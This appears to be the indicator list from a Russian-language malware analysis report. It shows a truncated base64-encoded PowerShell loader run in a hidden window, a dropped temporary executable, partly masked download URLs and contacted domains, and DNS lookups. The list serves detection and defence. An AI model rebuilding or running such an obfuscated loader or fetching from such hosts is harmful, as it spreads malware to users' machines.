Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAAbgBlAHcALQBvAGIASgBFAGMAVAAgAFMAeQBzAHQARQBNAC4AaQBvAC4AQwBPAG0AcABSAGUAcwBTAEkATwBuAC4ARABFAEYATABhAFQARQBTAFQAcgBFAGEAbQAoAFsAUwBZAFMAdABFAG0ALgBpAG8ALgBtAGUATQBvAFIAeQBzAFQAUgBFAG...
- %TEMP%\315717.exe
- %TEMP%\315717.exe
- 'so###eyetec.com':80
- 'db###rio.com':80
- 'db###rio.com':443
- 'im###nkade.com':80
- 'ws###iemann.de':80
- http://so###eyetec.com/Reax1k5/
- http://www.so###eyetec.com/Reax1k5/
- http://www.db###rio.com/EO3c3Zo/
- http://www.im###nkade.com/qPdXqy/
- http://ws###iemann.de/Hn6kr/
- 'db###rio.com':443
- DNS ASK so###eyetec.com
- DNS ASK db###rio.com
- DNS ASK im###nkade.com
- DNS ASK uk###.com.my
- DNS ASK ws###iemann.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAAbgBlAHcALQBvAGIASgBFAGMAVAAgAFMAeQBzAHQARQBNAC4AaQBvAC4AQwBPAG0AcABSAGUAcwBTAEkATwBuAC4ARABFAEYATABhAFQARQBTAFQAcgBFAGEAbQAoAFsAUwBZAFMAdABFAG0ALgBpAG8ALgBtAGUATQBvAFIAeQBzAFQAUgBFAG...' (со скрытым окном)